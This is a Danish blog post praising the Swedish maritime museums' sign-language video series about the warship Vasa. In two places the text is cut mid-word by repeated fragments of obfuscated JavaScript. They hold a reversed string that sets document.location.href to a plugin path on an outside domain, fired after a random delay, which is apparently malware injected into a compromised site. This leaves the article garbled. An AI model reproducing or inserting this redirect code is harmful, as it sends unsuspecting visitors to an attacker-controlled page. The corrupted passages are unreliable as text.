Maritime tegnsprogsfilm fra Vasamuseet

Teckenspråksfilm: Varför sjönk Vasa? from Statens maritima museer on Vimeo.

I forbindelse med min research om kulturarv og sociale medier i Norden for NCK er jeg stødt på en række film, som jeg ikke har set mage til. Dem må jeg dele!

På Statens Maritime Museer har de skabt en serie på foreløbig 7 små film, der på tegnsprog fortæller om Vasa. Hvorfor skibet sank, hvordan det blev bygget, om bjergningen, etc.  Filmene viser en kvinde, som på tegnsprog fortæller om det konkrete emne.

Jeg må med det samme tilstå, at jeg absolut intet véd om døve og tegnsprog. Men umiddelbart kunne jeg forestille mig, at der – som ved enhver anden tekstning, tabes nuancer i fortællingen, når man lægger tekst på allerede eksisterende film? Nuancer, som måske bedre kan komme med, når man fortæller histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torien med tegnsprog. I materiale, der er tilrettelagt for hørende, er det jo heller ikke altid, at man inkluderer billeder. Nogen gange nøjes vi med lyd. For hørende giver det den fordel, at man kan lave andre ting, mens man får en histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torie fortalt, men måske også, at man har mulighed for at koncentere sig om histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torien på en anden måde.

Så egentlig kan man måske tale om, at der her er syv små “podcasts for døve”? Under alle omstændigheder er det spændende med et museum, der gør forsøg med at anvende sociale medier til at skabe nye muligheder for personer med særlige behov. Filmene er NÆSTEN lige uploadet, så antallet af plays er stadig lavt, men mon det ikke ændrer sig i de kommende måneder 🙂

Links:
Statens Maritima Museer på Vimeo

Skriv et svar